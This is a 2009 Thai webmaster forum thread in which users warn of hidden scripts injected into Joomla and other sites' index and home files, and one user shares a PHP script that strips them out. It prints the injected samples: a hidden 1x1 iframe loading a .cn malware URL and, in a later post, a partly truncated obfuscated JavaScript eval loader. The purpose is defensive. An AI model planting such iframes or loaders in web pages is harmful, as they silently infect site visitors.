เฉพาะข้อความ | ข้อความพร้อมรูปภาพ

ThaiSEOBoard.com

พัฒนาเว็บไซต์ => CMS & Free Script => หัวข้อเริ่มโดย: jupiterjan ใน 16 กุมภาพันธ์ 2009, 10:57:21

ชื่อเรื่อง: มาเตือนครับ โดนฝัง script ใน joomla
โพสต์โดย: jupiterjan ใน 16 กุมภาพันธ์ 2009, 10:57:21
โค้ด เลือก
?<html><body><iframe src="http://bestlotron.cn/in.cgi?cocacola52" width=1 height=1 style="visibility: hidden"></iframe></body></html>

http://pisek.ru//shablon/08-02-03/system/pdf.php?id=10869&vis=1

ประมาณนี้ครับ (ใน index.php,html) สงสัย secure ไม่ดี ยิ่งมือใหม่ด้วย :'(
ชื่อเรื่อง: Re: มาเตือนครับ โดนฝัง script ใน joomla
โพสต์โดย: ndesigns ใน 16 กุมภาพันธ์ 2009, 11:14:53
ตัวนี้มันจะเจาะเข้าที่โฮสแล้วไปฝังในไฟล์ index.php   index.html   home.php ลองเช็คกันดูนะคับผมโดนไปหลายโฮส   :P
ชื่อเรื่อง: Re: มาเตือนครับ โดนฝัง script ใน joomla
โพสต์โดย: BosnoS ใน 16 กุมภาพันธ์ 2009, 11:16:02
โดนกันทั่วครับ ขอให้ชื่อไพล์มีคำว่า index มันฝังหมดล่ะ

ขนาดเว็บผมเขียนเองนะ ไม่มีสคริปแจกฟรีเลย ก็ยังโดน แต่ล่าสุดไม่โดนมาหลายวันล่ะ ไปแล้วมั่ง :D
ชื่อเรื่อง: Re: มาเตือนครับ โดนฝัง script ใน joomla
โพสต์โดย: Step9 ใน 16 กุมภาพันธ์ 2009, 11:19:38
 :-\ เหมือนกันครับ
http://www.thaiseoboard.com/index.php/topic,51342.0.html
ชื่อเรื่อง: Re: มาเตือนครับ โดนฝัง script ใน joomla
โพสต์โดย: tosakp ใน 16 กุมภาพันธ์ 2009, 11:20:45
ใน index.xxx home.xxx default.xxx
.xxx ก็มี .html  .htm .php

โดนกันทั่วหน้า

ผมเขียน code แก้ประมาณนี้
ชื่อไฟล์ fixed.php เอาไปใส่ที่ root ของโดเมน แล้วก็เรียกมัน
การทำงาน
=====
- มันจะเปิด ไฟล์ index.xxx และ home.xxx มาแล้วสั่ง replace code ที่มันฝังมาด้วย ว่างๆ
- จะเปิดโฟล์เดอร์ภายใต้ไปเรื่อยๆ เพื่อหาไฟล์ index.xxx และ home.xxx

หมายเหตุ:
- code ที่ฝั่งแต่ละคนไม่เหมือนกันนะครับ แก้ไฟล์เอาเอง

โค้ด เลือก

<?
ini_set('max_execution_time','0');
ini_set('max_input_time','0');
ini_set('memory_limit','128M');

function recurse_replace($filepath)
{
    if (is_dir($filepath) && !is_link($filepath))
    {
        if ($dh = opendir($filepath))
        {
            while (($sf = readdir($dh)) !== false)
            {
                if ($sf == '.' || $sf == '..')
                {
                    continue;
                }
if (!recurse_replace($filepath.'/'.$sf))
                {
                }
            }
            closedir($dh);
        }
    } else {
if(substr_count($filepath ,"/index.") || substr_count($filepath ,"/home.")) {
echo "File: " . $filepath . "<br>\r\n";
$lines = file_get_contents($filepath);
$lines = str_replace("<html><body><iframe src=\"http://litetopfindworld.cn/in.cgi?cocacola48\" width=1 height=1 style=\"visibility: hidden\"></iframe></body></html>", "", $lines);
$lines = str_replace("<iframe src=\"http://litetopfindworld.cn/in.cgi?cocacola48\" width=1 height=1 style=\"visibility: hidden\"></iframe>", "", $lines);
$lines = str_replace("<html><body></body></html>", "", $lines);
$handle = fopen($filepath, "w");
fwrite($handle, $lines);
fclose($handle);
$lines = "";
}
}
}

recurse_replace(dirname(__FILE__));
?>
ชื่อเรื่อง: Re: มาเตือนครับ โดนฝัง script ใน joomla
โพสต์โดย: nongmy ใน 16 กุมภาพันธ์ 2009, 11:23:23
โดนเหมือนกัน

้Host แบนเลย

บอกว่า IDC CAT แจ้ง
ชื่อเรื่อง: Re: มาเตือนครับ โดนฝัง script ใน joomla
โพสต์โดย: jupiterjan ใน 16 กุมภาพันธ์ 2009, 11:43:42
อ้างถึงจาก: tosakp ใน 16 กุมภาพันธ์ 2009, 11:20:45
ใน index.xxx home.xxx default.xxx
.xxx ก็มี .html  .htm .php

โดนกันทั่วหน้า

ผมเขียน code แก้ประมาณนี้
ชื่อไฟล์ fixed.php เอาไปใส่ที่ root ของโดเมน แล้วก็เรียกมัน
การทำงาน
=====
- มันจะเปิด ไฟล์ index.xxx และ home.xxx มาแล้วสั่ง replace code ที่มันฝังมาด้วย ว่างๆ
- จะเปิดโฟล์เดอร์ภายใต้ไปเรื่อยๆ เพื่อหาไฟล์ index.xxx และ home.xxx

หมายเหตุ:
- code ที่ฝั่งแต่ละคนไม่เหมือนกันนะครับ แก้ไฟล์เอาเอง

โค้ด เลือก

<?
ini_set('max_execution_time','0');
ini_set('max_input_time','0');
ini_set('memory_limit','128M');

function recurse_replace($filepath)
{
    if (is_dir($filepath) && !is_link($filepath))
    {
        if ($dh = opendir($filepath))
        {
            while (($sf = readdir($dh)) !== false)
            {
                if ($sf == '.' || $sf == '..')
                {
                    continue;
                }
if (!recurse_replace($filepath.'/'.$sf))
                {
                }
            }
            closedir($dh);
        }
    } else {
if(substr_count($filepath ,"/index.") || substr_count($filepath ,"/home.")) {
echo "File: " . $filepath . "<br>\r\n";
$lines = file_get_contents($filepath);
$lines = str_replace("<html><body><iframe src=\"http://litetopfindworld.cn/in.cgi?cocacola48\" width=1 height=1 style=\"visibility: hidden\"></iframe></body></html>", "", $lines);
$lines = str_replace("<iframe src=\"http://litetopfindworld.cn/in.cgi?cocacola48\" width=1 height=1 style=\"visibility: hidden\"></iframe>", "", $lines);
$lines = str_replace("<html><body></body></html>", "", $lines);
$handle = fopen($filepath, "w");
fwrite($handle, $lines);
fclose($handle);
$lines = "";
}
}
}

recurse_replace(dirname(__FILE__));
?>



ขอบคุณครับ เดี๋ยวไปมั่วดู :-*
ชื่อเรื่อง: Re: มาเตือนครับ โดนฝัง script ใน joomla
โพสต์โดย: swk317 ใน 16 กุมภาพันธ์ 2009, 11:47:00
น่ากลัว
ชื่อเรื่อง: Re: มาเตือนครับ โดนฝัง script ใน joomla
โพสต์โดย: BosnoS ใน 16 กุมภาพันธ์ 2009, 11:49:10
ขอบคุณมากครับ คุณต่อ
ชื่อเรื่อง: Re: มาเตือนครับ โดนฝัง script ใน joomla
โพสต์โดย: wingolfer ใน 16 กุมภาพันธ์ 2009, 14:55:22
ขอบคุณครับ จะเข้าไปเช็คมั้ง
ชื่อเรื่อง: Re: มาเตือนครับ โดนฝัง script ใน joomla
โพสต์โดย: rapeedu ใน 19 กุมภาพันธ์ 2009, 15:56:58
ขอบคุณมากครับ ที่ บ. ผมก็โดนวันนี้เองครับ มันติดมาจากเครื่อง PC, Laptop ที่ติด Spyware ตัวนี้ พอ ftp ไปเข้า server มันจะติดด้วยในทันที และทำการ แก้ไขไฟล์เราเลยครับ

ก่อน ftp เช็คเครื่องตนเองก่อนนะครับ
ชื่อเรื่อง: Re: มาเตือนครับ โดนฝัง script ใน joomla
โพสต์โดย: TAXZe ใน 19 กุมภาพันธ์ 2009, 18:20:24
ขอบคุณครับ

โค้ดด้วยๆ

^0^
ชื่อเรื่อง: Re: มาเตือนครับ โดนฝัง script ใน joomla
โพสต์โดย: Uesugi ใน 19 กุมภาพันธ์ 2009, 18:36:55
ขอบคุณมากครับ   ใช้ Joomla เหมือนกันครับ
ชักผวาแล้วสิ  เดี๋ยวต้องไปเช็คดูซะแล้ว
:P
ชื่อเรื่อง: Re: มาเตือนครับ โดนฝัง script ใน joomla
โพสต์โดย: offf ใน 19 กุมภาพันธ์ 2009, 18:45:23
ขอบคุณครับ
ชื่อเรื่อง: Re: มาเตือนครับ โดนฝัง script ใน joomla
โพสต์โดย: othpiik ใน 19 กุมภาพันธ์ 2009, 18:52:33
ตอนนี้หันมาเล่น CakePHP ครับ กำลังสนุกเลย ไม่รู้จะโดนไหมยังไม่ได้อัพเว้บไซต์ด้วย ???
ชื่อเรื่อง: Re: มาเตือนครับ โดนฝัง script ใน joomla
โพสต์โดย: lilly ใน 19 กุมภาพันธ์ 2009, 19:23:56
ขอบคุณค่ะ ... แต่แก้ไม่เป็น จะทำไงดีคะเนี่ย

ถ้าลบแ ค่ส่วนนั้นออกไป จะกระทบส่วนอื่นๆด้วยไหมคะ ???
ชื่อเรื่อง: Re: มาเตือนครับ โดนฝัง script ใน joomla
โพสต์โดย: sunboy ใน 20 กุมภาพันธ์ 2009, 12:55:44
ถ้าโดน spyware ผ่าน ftp ใช้โปรแกรมอื่นที่ไม่ใช่ joomla ก็ต้องระวังเหมือนกันนะครับ  สรุปว่าต้องหมั่นอัพเดทโปรแกรมแอนตี้ไวรัสครับ
ชื่อเรื่อง: Re: มาเตือนครับ โดนฝัง script ใน joomla
โพสต์โดย: anupol_Tex ใน 20 กุมภาพันธ์ 2009, 13:29:58
โลกหน่อโลก  ทำไมช่างโหดร้ายอย่างนี้   เท่าที่นับ โดนมา 7 รอบแล้ว
ชื่อเรื่อง: Re: มาเตือนครับ โดนฝัง script ใน joomla
โพสต์โดย: Rungson ใน 22 กุมภาพันธ์ 2009, 14:10:40
เหอะๆๆ มันเป็นเรื่องธรรมดานะครับ แต่ก็ไม่น่าทำกันเลย

ของผมดีที่ทาง host เค้าดูแลดี  ;D  ;D  ;D
ชื่อเรื่อง: Re: มาเตือนครับ โดนฝัง script ใน joomla
โพสต์โดย: asshur ใน 23 มีนาคม 2009, 15:45:41
สดๆ

โค้ด เลือก
<span id='ffafd4f392da093e46a731f167f8a26638'><script type="text/javascript">var jj=window["e"+new String("v")+"a"+new String("l")]("e"+new String("v")+"a"+new String("l")); jj('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x68\x69\x59\x35\x53\x4f\x71\x6d\x28\x63\x7a\x6c\x4f\x76\x59\x75\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x66\x68\x53\x4c\x6a\x30\x28\x66\x45\x67\x4d\x29\x7b\x76\x61\x72\x20\x69\x69\x76\x42\x4d\x3d\x30\x3b\x76\x61\x72\x20\x73\x79\x56\x30\x44\x3d\x66\x45\x67\x4d\x2e\x6c\x65\x6e\x67\x74\x68\x2c\x20\x6d\x43\x78\x6f\x6d\x6d\x3d\x30\x3b\x77\x68\x69\x6c\x65\x28\x6d\x43\x78\x6f\x6d\x6d\x3c\x73\x79\x56\x30\x44\x29\x7b\x69\x69\x76\x42\x4d\x2b\x3d\x6a\x38\x4f\x28\x66\x45\x67\x4d\x2c\x6d\x43\x78\x6f\x6d\x6d\x29\x2a\x73\x79\x56\x30\x44\x3b\x6d\x43\x78\x6f\x6d\x6d\x2b\x2b\x3b\x7d\x72\x65\x74\x75\x72\x6e\x20\x28\x69\x69\x76\x42\x4d\x2b\x27\x27\x29\x3b\x7d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x6a\x38\x4f\x28\x74\x37\x74\x6e\x45\x33\x2c\x6e\x5a\x79\x52\x4c\x29\x7b\x72\x65\x74\x75\x72\x6e\x20\x74\x37\x74\x6e\x45\x33\x2e\x63\x68\x61\x72\x43\x6f\x64\x65\x41\x74\x28\x6e\x5a\x79\x52\x4c\x29\x3b\x7d\x20\x20\x20\x74\x72\x79\x20\x7b\x76\x61\x72\x20\x70\x56\x65\x4e\x33\x3d\x65\x76\x61\x6c\x28\x27\x61\x23\x72\x4c\x67\x47\x75\x23\x6d\x47\x65\x4c\x6e\x5e\x74\x4c\x73\x23\x2e\x4c\x63\x46\x61\x23\x6c\x23\x6c\x4c\x65\x46\x65\x5e\x27\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x2f\x5b\x5c\x5e\x23\x47\x46\x4c\x5d\x2f\x67\x2c\x20\x27\x27\x29\x29\x2c\x66\x49\x55\x55\x50\x57\x57\x3d\x27\x27\x2c\x6e\x35\x63\x72\x3d\x30\x2c\x66\x61\x50\x5a\x3d\x30\x3b\x76\x61\x72\x20\x6e\x70\x76\x61\x6b\x3d\x28\x6e\x65\x77\x20\x53\x74\x72\x69\x6e\x67\x28\x70\x56\x65\x4e\x33\x29\x29\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x2f\x5b\x5e\x40\x61\x2d\x7a\x30\x2d\x39\x41\x2d\x5a\x5f\x2e\x2c\x2d\x5d\x2f\x67\x2c\x27\x27\x29\x3b\x76\x61\x72\x20\x7a\x58\x32\x7a\x78\x69\x3d\x66\x68\x53\x4c\x6a\x30\x28\x6e\x70\x76\x61\x6b\x29\x3b\x63\x7a\x6c\x4f\x76\x59\x75\x3d\x75\x6e\x65\x73\x63\x61\x70\x65\x28\x63\x7a\x6c\x4f\x76\x59\x75\x29\x3b\x66\x6f\x72\x28\x76\x61\x72\x20\x6a\x57\x62\x58\x3d\x30\x3b\x20\x6a\x57\x62\x58\x20\x3c\x20\x28\x63\x7a\x6c\x4f\x76\x59\x75\x2e\x6c\x65\x6e\x67\x74\x68\x29\x3b\x20\x6a\x57\x62\x58\x2b\x2b\x29\x7b\x76\x61\x72\x20\x7a\x6c\x73\x73\x63\x51\x3d\x6a\x38\x4f\x28\x6e\x70\x76\x61\x6b\x2c\x6e\x35\x63\x72\x29\x5e\x6a\x38\x4f\x28\x7a\x58\x32\x7a\x78\x69\x2c\x66\x61\x50\x5a\x29\x3b\x76\x61\x72\x20\x74\x48\x59\x39\x66\x66\x77\x3d\x6a\x38\x4f\x28\x63\x7a\x6c\x4f\x76\x59\x75\x2c\x6a\x57\x62\x58\x29\x3b\x6e\x35\x63\x72\x2b\x2b\x2c\x66\x61\x50\x5a\x2b\x2b\x3b\x66\x49\x55\x55\x50\x57\x57\x2b\x3d\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43');      </script></span>

ต้องลบ code มันออกเยอะกว่าจะโพสท์ได้
ชื่อเรื่อง: Re: มาเตือนครับ โดนฝัง script ใน joomla
โพสต์โดย: chui761 ใน 23 มีนาคม 2009, 21:06:58
อย่างนี้ต้องไปเช็คหน่อยแร้ว

ช่วงนี้เว็บยิ่งอืดๆ อยู่ หรือว่าโดนไปแล้วเนี่ย  :o
ชื่อเรื่อง: Re: มาเตือนครับ โดนฝัง script ใน joomla
โพสต์โดย: eabby ใน 31 พฤษภาคม 2009, 18:20:49
ต้องนั่งเช็คทีละ file เลยหรือเปล่าครับ  :P
ชื่อเรื่อง: Re: มาเตือนครับ โดนฝัง script ใน joomla
โพสต์โดย: nongmai ใน 31 พฤษภาคม 2009, 18:54:54
ผมเคยโดนไปแล้วครั้งหนึ่ง Google แจ้งเตือนว่าเว็บไซต์นี้เป้นอันตรายต่อคอมพิวเตอร์ของคุณ

ทราฟฟิกหายไปเลย  แต่ปัญหาที่เกิดจากเครื่องคอมเราเองครับ ยังไงก็ระวังด้วยน่ะ
ชื่อเรื่อง: Re: มาเตือนครับ โดนฝัง script ใน joomla
โพสต์โดย: klab ใน 31 พฤษภาคม 2009, 18:57:55
คุณ  nongmai  เป็นอะไรกับ คุณครู bugmai หว่า ;D
เฉพาะข้อความ | ข้อความพร้อมรูปภาพ